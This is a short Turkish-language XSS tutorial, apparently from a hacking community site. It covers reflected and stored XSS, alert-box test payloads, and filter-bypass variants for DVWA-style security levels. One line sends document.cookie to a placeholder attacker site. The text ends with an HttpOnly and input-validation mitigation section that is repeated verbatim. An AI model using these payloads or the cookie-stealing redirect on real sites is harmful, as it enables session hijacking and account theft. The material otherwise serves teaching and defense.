XSS Attack - XSS: Cross Site Scripting - Bu zafiyette dinamik bir web sayfasında girdi alanına kullanıcı tarafında çalışacak bir betik yerleştirilerek yapılır. - <script>alert(“hacklendin!”);</script> gibi bir kod parçası sonucu eğer ekranda “hacklendin!” yazan bir pop- up çıkıyorsa burada bir XSS zafiyetinden bahsedilebilir. - Eğer uygulama ASP ile yazılmış ve arkada MSSQL database varsa aşağıdaki kodun çalışması durumunda XSS var diyebiliriz. - <IMG SRC=vbscript:msgbox(“Vulnerable”);>orginalAttribute=”SRC” orginalPath=”vbscript:msgbox(“Vulnerable”);>” - XSS Reflected ve XSS Stored şeklinde iki tipi vardır. - XSS Reflected: Anlık olarak o kodu çalıştırabildiğimiz durumlar - XSS Stored: Arkaplanda database’e kayıt edilir. Ve sürekli olarak bunu depolamış olur. İkisinde de script çalıştırıyoruz bi farkı yoktur. - Client tarafından cookie değerini almak için aşağıdaki JS kodlarını gönderebiliriz; - <script>alert(document.cookie);</script> (Security Level: LOW, PHPIDS: disabled) - Eğer sistemlerde herhangi bir filtreleme varsa aşağıdaki gibi bir değer denenebilir. - <sCript>alert(document.cookie);</scRipt> (Security Level: MEDIUM, PHPIDS: disabled) - Ya da alternatif olarak aşağıdaki yöntem denenebilir. - <sc <script> ript>alert(document.cookie);</sc <script> ript> (Security Level: MEDIUM, PHPIDS: disabled) - Bir sayfaya yönlendirirken çerezi de beraberinde yollayan JS kodu: - window.location.href=”saldirganinsitesi.com/index.php?cookie=”+document.cookie;
XSS Attack Önleme Yöntemlerinden Biri - Bu atağı önlemek için alınacak önlemlerden bir tanesi de Cookie değeri set edilirken HTTPOnly Flag’i de set edilmeli. Böylelikle client side tarafında çalışan bir JS kodu cookie değerine erişemez. - httpd.conf dosyası içerisinde aşağıdaki konfigürasyonu girerek bu flag set edilmiş olur; - Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure - Tabi XSS’i önlemek için alınacak önlemlerden en iyisi yine girdi denetimi olacaktır. - Ancak unutulmaması gereken bir husus vardır ki o da sadece client side tarafında denetim yapılmasının yetersiz olacağıdır.
XSS Attack Önleme Yöntemlerinden Biri - Bu atağı önlemek için alınacak önlemlerden bir tanesi de Cookie değeri set edilirken HTTPOnly Flag’i de set edilmeli. Böylelikle client side tarafında çalışan bir JS kodu cookie değerine erişemez. - httpd.conf dosyası içerisinde aşağıdaki konfigürasyonu girerek bu flag set edilmiş olur; - Header edit Set-Cookie ^(.*)$ $1;HttpOnly;Secure - Tabi XSS’i önlemek için alınacak önlemlerden en iyisi yine girdi denetimi olacaktır. - Ancak unutulmaması gereken bir husus vardır ki o da sadece client side tarafında denetim yapılmasının yetersiz olacağıdır.
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
